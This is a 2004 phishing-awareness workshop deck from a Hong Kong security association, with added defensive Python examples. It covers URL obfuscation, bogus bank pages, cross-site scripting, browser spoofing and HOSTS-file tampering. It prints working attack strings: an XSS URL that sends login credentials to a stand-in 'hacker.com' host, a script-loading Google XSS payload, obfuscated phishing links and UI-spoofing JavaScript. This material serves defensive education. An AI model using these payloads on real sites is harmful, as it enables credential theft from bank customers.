  • 19. Phishing and Bogus Website in Hong Kong [Bar chart: Phishing and Bogus Website Report, reported cases per month from Jun-03 to Jul-04, two series (Phishing Report, Bogus Website); y-axis 0 to 50 reported cases, highest monthly value 45] Source: Hong Kong Police Force 19 (PHISHING )
  • 20. 2. Attack Strategies and Technologies • Before 2003, Social Engineering was the major attack – Email with impersonated name and logo, together with disguised tone of messages – Two technical tricks were also used • Cousin URL carry similar • Bogus URL using old techniques • Since 2003, technologies emerged to trick the browser, or even mimic the SSL web page style • Face Lift • Bogus URL using new techniques • Cross-site Scripting • Visual Spoofing • Other attacks 20 (PHISHING )
  • 21. 2.1 Cousin URL
      Hong Kong Banking Bogus Websites (Source: Hong Kong Police Force): 2003 (Jan-Dec) 8 cases; 2004 (Jan-Jul) 18 cases
      Some Cousin URLs as example (real domain, followed by the bogus cousin URLs):
      • www.hkbea.com: www.eastasiacredit.com, www.onlinebea.com
      • www.hsbc.com: www.hkhsbc.com
      • hk.dbs.com: www.dbshk.net
      • www.standardchartered.com: www.scbltd.com
      • www.dahsing.com: www.dasxin.com, www.dlfh.com
      • www.iba.com.hk: www.ibabankhk.com, www.hkiba.com
      • More…
      21 (PHISHING )
  • 22. Cousin URL: https://visa-secure.com/personal/secure_with_visa/ 22 (PHISHING )
  • 23. 2.2 URL Obfuscation Attack • Normal representation of URL – Domain: http://www.pisa.org.hk • Dotted representation of IP address URL – Decimal: http://202.81.255.242 – Hexadecimal: http://0xca.0x51.0xff.0xf2 – Octal http://0312.0121.0377.0362 • Dot-less representation of IP address URL – Decimal: http://3639552355 http://7689338866 … – Hexadecimal: http://0xCA51FFF2 – Reference: A dot-less Decimal IP calculator can be found at http://www.tcp-ip.nu/cgi-bin/tcp-ip/calc.cgi 23 (PHISHING )
  • 24. 2.2 URL Obfuscation Attack • Valid Use of “@” – “RFC1738 - URL” and “RFC2396 – URI Generic Syntax” allow a valid Uniform Resource Locator (URL) syntax <user>:<password>@<host>:<port>/<url-path> – Application: use URL to carry username and password, e.g. • ftp://user1:pass@myftp.com:1021/public/file1.gzip • Malicious Use of “@” to hide bogus host – http://www.microsoft.com@www.pisa.org.hk – http://www.microsoft.com@202.81.255.242 (IP address) – http://www.microsoft.com@3394371570 (decimal representation) – http://www.microsoft.com11111111111111111111111111111111111111111111111111111111111@3394371570 (padding pushes the real host out of the visible part of the address bar) • Browser’s Address bar and Status bar CAN DISPLAY the actual content but normal user may not notice 24 (PHISHING )
  • 25. 2.2 URL Obfuscation Attack • Escaped Encoding (or % encoding) – “RFC1738 - URL” and “RFC2396 – URI Generic Syntax” allow URL characters to be encoded as their ASCII code in hexadecimal: “%##” (##: 00 – FF) • %20 = [space], %2E = “.”, %7E = “~” • %31 = “1”, %32 = “2” • %41 = “A”, %61 = “a” – Where will this URL bring you to? • http://www.microsoft.com@%79%61%68%6F%6F%2E%63%6F%6D = http://www.microsoft.com@yahoo.com • Browser’s Address bar and Status bar CAN DISPLAY the actual content but normal user may not notice • Reference of % Encoding and online encoder/decoder http://www.blooberry.com/indexdot/html/topics/urlencoding.htm 25 (PHISHING )
  • 26. 2.2 URL Obfuscation Attack • Other derived formats of URI – Unicode encoded URL • Unicode was designed to allow multiple language implementations of the ASCII character set • http://&#119;&#119;&#119;&#46;&#112;&#105;&#115;&#97;&#46;&#111;&#114;&#103;&#46;&#104;&#107; – Mixed Unicode and ASCII • http://&#119;&#119;&#119;%2E%70%69%73%61%2E%6F%72%67%2E%68%6B • References Unicode Encoding: http://www.unicode.org/ Free Online UTF Decoder (choose “Freeform numeric”): http://software.hixie.ch/utilities/cgi/unicode-decoder/utf8-decoder 26 (PHISHING )
  • 27. 2.2 URL Obfuscation Attack • IE or other browser Vulnerability in displaying proper URL at – Status Bar – Address Bar 27 (PHISHING )
  • 28. URL Obfuscation Attack (Status Bar) • Inline Javascript – <A Href= … onMouseOver=..> • <Form> • <Table> • <Table Border> • <Image Map> 28 (PHISHING )
  • 29. URL Obfuscation Attack (Address Bar) (IE vulnerability in displaying URL) • IE 5.x to 6.0 has a vulnerability in handling URLs. When the URL contains special characters, the character string after the special character is not displayed. (Microsoft knowledgebase article 834489) • For example, use escaped encoded characters %00 (null character) and %01 – http://www.yahoo.com%01%00@www.pisa.org.hk – http://www.yahoo.com%01%00@202.81.255.242 – http://www.yahoo.com%01%00@3394371570 • IE will bring user to “www.pisa.org.hk”, whereas the Address bar and Status bar cannot display the true visited URL! 29 (PHISHING )
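The tricks on slides 23 to 29 (dotted and dot-less numeric hosts in decimal, hexadecimal and octal, %-encoding, HTML numeric entities, userinfo before “@”, and %00/%01 control characters) all fold back to one real host. The helper below is an added Python example, not PISA's code; it assumes a dot-less value above 2^32 wraps around, which is how the slide's 7689338866 reaches 202.81.255.242.

```python
import html
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Hypothetical helper (added example, not PISA's code): reduce a link to the
# host the browser would actually contact and list the obfuscation tricks used.

# One label of a numeric host: hex (0xca), octal (0312) or decimal (202).
_NUMERIC_LABEL = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.I)


def _label_to_int(label):
    low = label.lower()
    if low.startswith("0x"):
        return int(low[2:], 16)
    if len(low) > 1 and low.startswith("0"):
        return int(low, 8)
    return int(low, 10)


def canonical_ipv4(host):
    """Dotted-decimal form of a dotted or dot-less numeric host, else None."""
    labels = host.split(".")
    if not all(_NUMERIC_LABEL.match(lab) for lab in labels):
        return None
    if len(labels) == 1:
        # Dot-less form: one 32-bit integer. Assumption: values above 2^32
        # wrap, which is how the slide's 7689338866 reaches 202.81.255.242.
        return str(ipaddress.IPv4Address(_label_to_int(labels[0]) % (1 << 32)))
    if len(labels) != 4:
        return None
    octets = [_label_to_int(lab) for lab in labels]
    if any(o > 255 for o in octets):
        return None
    return ".".join(str(o) for o in octets)


def analyse_url(url):
    """Return (effective host, findings) for a link as it appears in an e-mail."""
    findings = []
    # Step 1: undo HTML numeric entities (&#119; -> w), then %XX escapes.
    decoded = html.unescape(url)
    if decoded != url:
        findings.append("html-entity-encoding")
    unescaped = unquote(decoded)
    if unescaped != decoded:
        findings.append("percent-encoding")
    # Step 2: %00/%01-style control characters cut off what old IE displayed.
    if any(ord(ch) < 0x20 for ch in unescaped):
        findings.append("control-characters")
    # Step 3: everything before "@" is userinfo; the real host follows it.
    netloc = urlsplit(unescaped).netloc
    host = netloc
    if "@" in netloc:
        findings.append("userinfo-before-host")
        host = netloc.rsplit("@", 1)[1]
    host = host.split(":", 1)[0]  # drop an explicit port
    # Step 4: fold decimal/hex/octal and dot-less IP spellings to one form.
    ip = canonical_ipv4(host)
    if ip is not None:
        if host != ip:
            findings.append("numeric-host-obfuscation")
        host = ip
    return host, findings


if __name__ == "__main__":
    for link in ("http://www.microsoft.com@3394371570",
                 "http://www.yahoo.com%01%00@www.pisa.org.hk"):
        print(link, "->", analyse_url(link))
```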
  • 30. IE vulnerability in displaying URL • MS04-004 (2004-02) released a patch to remove support in HTTP for the URI format <user>:<password>@<host>:<port>/<url-path> http://www.microsoft.com/technet/security/Bulletin/MS04-004.asp • However, after applying the patch, Address bar and Status bar still do NOT display the correct URL. 30 (PHISHING )
  • 31. Known Attack using the MS04-004 • Exploit-URLSpoof Trojan • McAfee alert http://vil.nai.com/vil/content/v_100927.htm 31 (PHISHING )
  • 32. IE vulnerability in handling URL • Works with a DNS server which accepts any (dummy) subdomain, e.g. http-equiv.dyndns.org • http://www.microsoft.com.technet.security.bulletin.MS04-029.mspx.12345.1234512345123456789012345671234567890123456789.box&&cm=&ce=3&hl=malware.http-equiv.dyndns.org/~http-equiv/mwaresoft.html Effective = *.http-equiv.dyndns.org/~http-equiv/mwaresoft.html • Reference URL: http://www.malware.com/malwaresoft.html 32 (PHISHING )
  • 33. 2.2 URL Obfuscation Attack • Shortened URL – http://www.rapp.org/url/ • PISA http://www.rapp.org/url/?IUVST6C8 • Workshop: Phishing Exposed http://www.rapp.org/url/?KRRQ7YYH – http://csua.org/u/ • PISA http://csua.org/u/9fy • Workshop: Phishing Exposed http://csua.org/u/9iu 33 (PHISHING )
  • 34. Demonstration 2 URL Obfuscation Attacks 34 (PHISHING )
  • 35. 2.3 Face Lift • Use URL Redirect or similar technology • Take advantage of the real web site’s face to confuse the identity of Bogus Login Page <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/"> [Figure: Online Banking Main Page (real) shown behind an Online Login pop-up (bogus) with Username myuserid, Password *******] 35 (PHISHING )
  • 36. Case Study ANZ bank phishing Email content: “%##” hexadecimal format: http://anz.com.au%32inetbank%32%32%32@%36%31%2E%31%30%2E%31%32%30%2E%32%30%30:%32%37%38%34/%69%6E%65%74%62%61%6E%6B/%69%6E%64%65%78%2E%68%74%6D Bogus URL – old technique (decoded): http://anz.com.au2inetbank222@61.10.120.200:2784/inetbank/index.htm 36 (PHISHING )
  • 37. Content of BOGUS web page “http://61.10.120.200:2784/inetbank/index.htm”:
      <script LANGUAGE="JavaScript">
      :
      SafeAddOnload(PUWStart);                                  (1) PopUp page Login
      gPopupWindow = new PopupWindow("login.htm", 350, 150);
      gPopupWindow.toolbar = false;
      gPopupWindow.statusbar = true;
      gPopupWindow.resizable = true;
      gPopupWindow.ontop = true;
      </script>
      </head>
      <body bgcolor="#FFFFFF" text="#000000">
      <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/">   (2) Background Redirect
      37 (PHISHING )
  • 38. Online Banking Login (Bogus) 1 PopUp page Login No SSL 2 Background Redirect <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/"> 38 (PHISHING )
  • 39. Case Study ANZ bank phishing Face Lift 2 2 1 userid ******** 39 (PHISHING )
  • 40. Case Study ANZ bank phishing Track Hiding After entering PIN SSL padlock shown ??!! 40 (PHISHING )
  • 41. Online Banking Login (real) Real digital cert of web site Real login has SSL padlock 41 (PHISHING )
  • 42. Defense vs. Cousin URL (Prevention) • Use a consistent and persistent web interface • Communicate a Single Simple Domain name
      XYZBank owns these domains and has a web server for each: xyzbank.com, xyzcorp.com, xyzgroup.com
      They use these domains for Online banking: online-xyzbank.com, secure-xyzbank.com
      They use these domains for HK and Australia Online banking: online-xyzbank.com.hk, secure-xyzbank.com.au
      42 (PHISHING )
  • 43. Defense vs. Cousin URL (Prevention) • Is this better?
      XYZBank owns these domains: xyzbank.com (only active domain), xyzcorp.com (forwards to xyzbank.com), xyzgroup.com (forwards to xyzbank.com)
      They use these subdomains for Online banking: online.xyzbank.com (personal banking), secure.xyzbank.com (corporate banking)
      They use these URL paths for HK and Australia Online banking: online.xyzbank.com/hk/, secure.xyzbank.com/au/
      43 (PHISHING )
  • 44. Defense vs. Cousin URL (Detection) • Brand Management • Domain Monitoring Can be Outsourced • Web Crawling • Intelligence Report from Spam Filtering services 44 (PHISHING )
  • 45. Detection (Server side) • Detect Mirroring from Copycat Web Site – Monitor large volume traffic, especially from a single subnet – Place Honeypot links (invisible links with no legitimate use) and check the “access log” to detect access to them • Detect Referral Site – At your web server monitor the referrer information in the “access log”; it may give you information on the referral site, search engine or attacker behind a FaceLift / Framing / etc. attack 45 (PHISHING )
  • 46. Server and Site Design Reference • PISA’s HK e-Commerce Security Survey 2003 – Non-intrusive and Anonymous study on 25 local on-line transaction sites • Application design • SSL and Encrypted Communication Digital Certificate Implementation • Password Management • Operation Control – URL • http://www.pisa.org.hk/projects/websec2003/websec2003.htm 46 (PHISHING )
  • 47. Detection (Client side) • Browser – check digital certificate; and turn on alert when browser enters or leaves SSL mode 47 (PHISHING )
  • 48. Detection (Client side) • SpoofStick (browser plug-in) • eBay Toolbar (browser plug-in) – Incorporated “Web CallerID” technology (acquired from WholeSecurity) to detect suspicious activity in web page. Web CallerID acts like a heuristic filter for phishers, detecting previously undiscovered spam • http://www.eweek.com/article2/0,1759,1636422,00.asp 48 (PHISHING )
  • 49. Detection (Client) • Some Antivirus programs detect malicious popup javascript in web page 49 (PHISHING )
  • 50. Detection (Client) • http://%32%31%31%2E%39%37%2E%32%34%38%2E%36%30:%38%37/%63%69%74/%69%6E%64%65%78%2E%68%74%6D ( http://211.97.248.60:87/cit/confirm.htm) 50 (PHISHING )
  • 51. 2.4 Cross-Site Scripting • A cross-site scripting vulnerability allows the introduction of malicious content (scripts) on a web site, that is then served to users (clients) – Malicious scripts get executed on clients that trust the web site – Problem with potentially all client-side scripting languages • Use “XSS” to refer to these vulnerabilities, to avoid confusion with “CSS” (cascading style sheets) 51 (PHISHING )
  • 52. XSS Concept • Any way to fool a legitimate web site to send malicious code to a user’s browser • Almost always involves user content (third party) – Error messages – User comments – Links • References – http://www.cert.org/archive/pdf/cross_site_scripting.pdf – http://www.spidynamics.com/support/whitepapers/SPIcross-sitescripting.pdf 52 (PHISHING )
  • 53. Why the Name • You think that you interact with site Z • Site Z has been poisoned by attacker • The “poison” (e.g. JavaScript) is sent to you, along with legitimate content, and executes. It can exploit browser vulnerabilities, or contact site M and steal your cookies, usernames and passwords... [Diagram: user surfing site Z, which carries the attacker’s poison; the hostile code executes in the browser and contacts site M] 53 (PHISHING )
  • 54. XSS Risks • Theft of account credentials and services • User tracking (stalking) and statistics • Misinformation from a trusted site • Denial of service • Exploitation of web browser – Create phony user interface – Exploit a bug in the browser – Exploit a bug in a browser extension such as Flash or Java • Etc. 54 (PHISHING )
  • 55. XSS Risks - Stolen Account Credentials • With XSS, it may be possible for your credentials to be stolen and used by attacker • Sites requiring authentication need a technological solution to avoid continuously asking users for passwords – Credentials have the form of a SessionID or nonce • Url encoding (GET method) – http://www.site.com?ID=34539027644 • Cookies are commonly used to store credentials – These are usually accessible to client-side scripts 55 (PHISHING )
  • 56. Cookie Mechanism and Vulnerabilities • Used to store state on the client browser • Access Control – Includes specification of which servers can access the cookie (a basic access control) • Including a path on the server – So cookie can be used to store secrets (sessionIDs or nonces) 56 (PHISHING )
  • 57. XSS - Point • XSS vulnerabilities fool the access control mechanism for cookies • The request for the cookie (by scripts) comes from the poisoned server, and so is honored by the client browser – No vulnerabilities needed in the client browser 57 (PHISHING )
  • 58. XSS Risk - Privacy and Misinformation • Scripts can “spy” on what you do – Access history of sites visited – Track content you post to a web site • Scripts can misinform – Modify the web page you are viewing – Modify content that you post • Privacy (“I have nothing to hide”) – Knowledge about you can be valuable and be used against you • Divorces, religion, hobbies, opinions • etc. 58 (PHISHING )
  • 59. Example: Google’s XSS Vulnerability • Just made public on Oct 20. • Scripts can be injected into Google to make it become a subscription service: – http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%7 0%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75 %6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28% 64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65 %6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73% 72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69 %6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27 59 (PHISHING )
  • 60. Example: Google’s XSS Vulnerability 60 (PHISHING )
  • 61. XSS Risk - Denial of Service • Nasty JavaScripts can make your web site inaccessible – Make browsers crash or become inoperable – Redirect browsers to other web sites 61 (PHISHING )
  • 62. XSS Risk - Silent Install • Exploitation of browser vulnerabilities – JavaScript, ActiveX, etc. allow the exploitation of browser vulnerabilities • Run locally on your machine • User security confirmation bypass vulnerability in Microsoft Internet Explorer 6.0 SP2: – http://securityfocus.com/bid/11200/ – Allows malicious users to trivially bypass the requirement for user confirmation to load JavaScript or ActiveX – Installation of malicious code 62 (PHISHING )
  • 63. XSS Risk - Phishing • User Interface Modifications – Present fake authentication dialogs, capture information then perhaps redirect user to real web site – Replace location toolbar to make user think they are visiting a certain web site • Phishing Scenario • Victim logs into a web site • Attacker has spread “mines” using an XSS vulnerability • Victim stumbles upon an XSS mine • Victim gets a message saying that their session has expired, and they need to authenticate again • Victim’s username and password are sent to attacker 63 (PHISHING )
  • 64. Demonstration 3 - www.pisabank.com 64 (PHISHING )
  • 65. After successful user login... 65 (PHISHING )
  • 66. However, if login failed... 66 (PHISHING )
  • 67. Try to put scripts in URL... 67 (PHISHING )
  • 68. Reveal the injected scripts... 68 (PHISHING )
  • 69. Target to inject codes like this... 69 (PHISHING )
  • 70. We create the following url... • http://www.pisabank.com/banklogin.jsp?serviceName=PisabankCaastAcce ss&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_ URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action= %22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimag e%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20% 2b%20document.forms(2).login.value%20%2b%20':'%20%2b%20docume nt.forms(2).password.value;%22%3E 70 (PHISHING )
  • 71. Put the url in scam mails... 71 (PHISHING )
  • 72. When the hyperlink is clicked... 72 (PHISHING )
  • 73. After the user login, nothing special... 73 (PHISHING )
  • 74. However... • In www.hacker.com’s web server log, login name and password are recorded – 192.168.0.1 - - [14/Oct/2004:11:01:52 +0800] "GET /bernard:IlovePisa HTTP/1.1" 404 719 74 (PHISHING )
  • 75. XSS - Prevention • For users: – disable scripting in browser (some personal firewall can selectively block/allow scripts from particular web sites) – do not trust links in e-mails, type url directly in browser – always logout before browsing elsewhere – keep up with web browser patches and versions 75 (PHISHING )
  • 76. XSS - Prevention • For administrators/developers: – User input should be parsed and filtered properly, especially < > “ ‘ % ; ) ( & + - – Some decent guidelines for input filtering can be found in the OWASP Requirements document “OWASP Guide to Building Secure Web Applications and Web Services” • http://www.owasp.org/documentation/guide.html – Output based on input parameters should have its special characters encoded (ISO 8859-1) • http://www.cert.org/advisories/CA-2000-02.html 76 (PHISHING )
  • 77. XSS - Prevention • For administrators/developers: – For cookies: set the HttpOnly flag. Scripts that run in a browser can’t access cookie values with flag set – Keep up with web server patches – periodically test for XSS vulnerabilities by using web application scanners • e.g. Web Scarab http://www.owasp.org/software/webscarab.html 77 (PHISHING )
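The two developer-side measures on slides 76 and 77, output encoding and the HttpOnly cookie flag, applied to the page's own scenario: a login page that echoes the err parameter (slides 66 to 70). This is an added Python example, not PISA's code; the banklogin.jsp stand-in, the form markup and the session id value are constructed for illustration.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Added example, not PISA's code: a stand-in for the page's hypothetical
# banklogin.jsp, which echoes the "err" query parameter into the login page.

# Constructed form markup; the attack on slide 70 closes this form and opens
# its own with an onsubmit handler, so the count of "<form" is the tell-tale.
LOGIN_FORM = (
    '<form action="login.jsp" method="post">'
    '<input name="login"><input name="password" type="password">'
    '<input type="submit" value="Login"></form>'
)


def _err_param(url):
    """Value of the err parameter, already %-decoded by parse_qs."""
    return parse_qs(urlsplit(url).query).get("err", [""])[0]


def render_login_vulnerable(url):
    """Reflects err verbatim: </form><form onsubmit=...> rewrites the page."""
    return f'<p class="error">{_err_param(url)}</p>\n{LOGIN_FORM}'


def render_login_hardened(url):
    """Output-encodes err so < > & " ' reach the browser as entities, not markup."""
    safe = html.escape(_err_param(url), quote=True)
    return f'<p class="error">{safe}</p>\n{LOGIN_FORM}'


def session_cookie_header(session_id):
    """Set-Cookie line for the session id; HttpOnly keeps it out of script reach."""
    jar = SimpleCookie()
    jar["JSESSIONID"] = session_id
    jar["JSESSIONID"]["httponly"] = True   # document.cookie cannot read it
    jar["JSESSIONID"]["secure"] = True     # only sent over SSL
    jar["JSESSIONID"]["path"] = "/"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    # Constructed payload in the style of slide 70.
    link = ("http://www.pisabank.com/banklogin.jsp?err=%3C/form%3E%3Cform%20"
            "action=%22login1.jsp%22%20onsubmit=%22alert('XSS')%22%3E")
    print(render_login_vulnerable(link))
    print(render_login_hardened(link))
    print(session_cookie_header("EXAMPLESESSIONID"))
```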
  • 78. XSS - Detection • XSS exploits can be detected by reviewing web server access log, e.g.: 192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET /banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimage%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20%2b%20document.forms(2).login.value%20%2b%20':'%20%2b%20document.forms(2).password.value;%22%3E HTTP/1.1" 200 4058 78 (PHISHING )
  • 79. XSS - Detection • XSS exploits can also be detected by network- based Intrusion Detection System (IDS), e.g. [**] WEB-MISC cross site scripting attempt [**] 10/21-23:04:54.960511 192.168.1.152:3341 -> 192.168.1.100:80 TCP TTL:128 TOS:0x0 ID:28082 IpLen:20 DgmLen:307 DF ***AP*** Seq: 0xAB1F9A5C Ack: 0xEFB2E94B Win: 0x4470 TcpLen: 20 47 45 54 20 2F 62 61 6E 6B 6C 6F 67 69 6E 2E 6A GET /banklogin.j 73 70 3F 65 72 72 3D 3C 73 63 72 69 70 74 3E 61 sp?err=<script>a 6C 65 72 74 28 27 58 53 53 27 29 3C 2F 73 63 72 lert('XSS')</scr 69 70 74 3E 20 48 54 54 50 2F 31 2E 31 0D 0A 41 ipt> HTTP/1.1..A 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 ccept: */*..Acce 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D pt-Language: zh- 68 6B 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 hk..User-Agent: 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D Mozilla/4.0 (com 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E patible; MSIE 6. 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 0; Windows NT 5. 30 29 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 70 69 0)..Host: www.pi 73 61 62 61 6E 6B 2E 63 6F 6D 0D 0A 43 6F 6E 6E sabank.com..Conn 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali 76 65 0D 0A 43 6F 6F 6B 69 65 3A 20 4A 53 45 53 ve..Cookie: JSES 53 49 4F 4E 49 44 3D 32 42 43 43 39 44 45 36 43 SIONID=2BCC9DE6C 44 43 46 45 44 44 37 45 32 35 42 43 46 33 44 36 DCFEDD7E25BCF3D6 38 39 35 38 30 46 32 0D 0A 0D 0A 89580F2.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 79 (PHISHING )
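The access-log review of slide 78 and the referrer check of slide 45, as an added Python example that is not PISA's code: it decodes each query parameter, looks for markup that never belongs in a value, and flags requests referred from a host other than the bank's own. The log lines are constructed for this example (the second reproduces slide 78 with apostrophes %27-encoded, the third the request from slide 79); the attacker host name and the "bogus-site.example" referrer are placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Added example, not PISA's code: scan Apache-style access-log lines for
# reflected-XSS payloads in query parameters and for foreign referrers.

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Markup and script fragments that never belong inside a query-string value.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*(script|form|iframe|img|object|embed)\b"
    r"|javascript:"
    r"|\bon(load|error|mouseover|submit|click|focus)\s*=",
    re.I,
)


def suspicious_params(path):
    """Names of query parameters whose decoded value carries XSS markers."""
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        # parse_qsl decoded once; a second unquote catches double encoding.
        if XSS_MARKERS.search(unquote(value)):
            hits.append(name)
    return hits


def scan_line(line, own_hosts):
    """Parse one log line; return a record with its alerts, or None if unparseable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    alerts = [f"xss-in-param:{p}" for p in suspicious_params(m.group("path"))]
    referer = m.group("referer")
    if referer and referer != "-":
        ref_host = urlsplit(referer).hostname
        if ref_host and ref_host not in own_hosts:
            alerts.append(f"foreign-referer:{ref_host}")
    return {"ip": m.group("ip"), "time": m.group("ts"), "alerts": alerts}


def scan_log(lines, own_hosts=("www.pisabank.com",)):
    """Return one record per line that raised at least one alert."""
    found = []
    for line in lines:
        rec = scan_line(line, own_hosts)
        if rec and rec["alerts"]:
            found.append(rec)
    return found


# Constructed sample log: line 2 follows slide 78 (apostrophes %27-encoded),
# line 3 the request shown in the slide-79 IDS alert; lines 1 and 4 are made up.
SAMPLE_LOG = [
    '192.168.1.10 - - [14/Oct/2004:10:30:00 +0800] "GET /banklogin.jsp?err=Login+failed HTTP/1.1" 200 4058 "http://www.pisabank.com/" "Mozilla/4.0"',
    '192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET /banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimage%20=%20new%20Image;XSSimage.src=%27http://attacker.example/%27%20%2b%20document.forms(2).login.value%20%2b%20%27:%27%20%2b%20document.forms(2).password.value;%22%3E HTTP/1.1" 200 4058',
    '192.168.1.152 - - [21/Oct/2004:23:04:54 +0800] "GET /banklogin.jsp?err=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 4058',
    '192.168.1.20 - - [14/Oct/2004:10:40:00 +0800] "GET /images/logo.gif HTTP/1.1" 200 1201 "http://bogus-site.example/inetbank/index.htm" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        print(rec["time"], rec["ip"], ", ".join(rec["alerts"]))
```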
  • 80. 2.5 Visual spoofing • Targets the web browser interface • Display fake menu bar, status bar, dialogue box on a web browser – The address bar displays the fake URL address – The status bar displays the golden “lock” icon indicating a secure SSL session, which has often been cited as a differentiator between legitimate sites and scams – The download or installation dialogue box shows fake information 80 (PHISHING )
  • 81. How it works? Graphic substitution approach 1. The bogus web page are opened without the menu bar and status bar window.open(“bogus.htm", "_blank", "height=700, width=683, location=no, menubar=no, toolbar=no, status=no, resizable=no, scrollbars=no"); 2. The menu bar and status bar (with the golden “lock” icon) images are displayed at the top and bottom of the bogus web page to disguise as part of the browser user interface 81 (PHISHING )
  • 82. Graphic Substitution Approach Header image Bogus web content Footer image 82 (PHISHING )
  • 83. Graphic Substitution Approach 3. Combine with the java commands “window.createPopup()” and “popup.show()”, attacker can hijack the entire user’s desktop and construct a fake interface to capture and manipulate what the user sees. op=window.createPopup(); op.document.body.innerHTML="...html..."; op.show(0,0,screen.width,screen.height,document.body); 83 (PHISHING )
  • 84. Browser UI Rebuild Approach 1. The bogus web page are opened without the menu bar and status bar 2. Some browser user interface functions (including the certification view function) are rebuilt on the bogus web page through download XUL (XML- based User interface Language. Standards based language developed by mozilla.org to create cross- platform user interfaces for Mozilla-based products such as the browser.) Reference: http://www.nd.edu/~jsmith30/xul/test/spoof.html 84 (PHISHING )
  • 85. Browser UI Rebuild Approach 85 (PHISHING )
  • 86. Overriding Page Content Approach • IE browser allows creation of chromeless windows which are screen objects that do not have the normal borders and other controls attached to them. Through javascript, they can be positioned to hide or replace (by “sitting on top”) underlying content. • Attackers make use of these chromeless windows to spoof the graphical components of browser, such as URL address bar and dialogue boxes for file download, software installation, and bookmark. 86 (PHISHING )
  • 87. 2.5 Visual spoofing • Defense – Keep your web browser updated – Disable the javascript functions which hide your web browser menu and status bar – Check the page info and property of the view web page before proceed – Print mark browser UI 87 (PHISHING )
  • 88. Demonstration 4 Visual Spoofing Graphical Substitution FireFox Browser UI Rebuild Approach Chromeless Window 88 (PHISHING )
• 89. 2.6 Other Attacks: Trojan, Keylogger, Screen Grabber
  An attacker can lure the victim into installing a Trojan horse program through a bogus software patch or update web page. Once the victim has installed the Trojan horse program, the attacker can closely monitor the victim's PC activities by capturing its keystrokes and screen display.
  – Keylogger
    • Captures the victim's keystrokes in all windows
  – Screen Grabber
    • Screen dump or even video stream of the victim's screen display
• 90. Demonstration 5: Keylogger and Screen Grabber using BackOrifice
• 91. 2.6 Other Attacks: Man in the Middle Attack
  By poisoning the victim's DNS server, the attacker can redirect the traffic of a legitimate site to the attacker's server, where the attacker can sniff password information even in an HTTPS connection.
  [Slide figure: Victim PC, Attacker server, Legitimate web server. The victim thinks that he is talking to the legitimate site; actually, the victim is talking to the attacker's server, which sniffs the password information and proxies the HTTPS traffic between the victim and the legitimate web server]
• 92. New Quiet Attack (4-Nov-2004)
• Change of HOSTS file
  – Captures online banking details WITHOUT requiring users to click on a website link
  – Works even if the USER TYPES IN THE URL MANUALLY
  – Working Principle
    • Execution of a trojan that modifies the HOSTS file
    • The HOSTS file overrides DNS resolution
    • The user is brought to the malicious site the next time he goes to that online transaction site
• Defense
  – Ensure Windows Scripting Host is disabled
  – Have AV and anti-spyware software installed
• Reference: http://www.vnunet.com/news/1159171
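Added example, not from the PISA slides: a Python check for the HOSTS-file tampering described on slide 92, run against a constructed HOSTS file. The bank host names in the watch list and the addresses in the sample are assumptions.

```python
import ipaddress

# Constructed HOSTS file content (not from the slides): a benign loopback entry plus an entry
# that pins the bank's host names to an attacker-controlled address, as the slide describes.
HOSTS_SAMPLE = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
192.0.2.45      www.pisabank.com  pisabank.com   # added by the trojan
::1             localhost
"""
# Host names of the online transaction sites to watch (assumption: a site-specific list).
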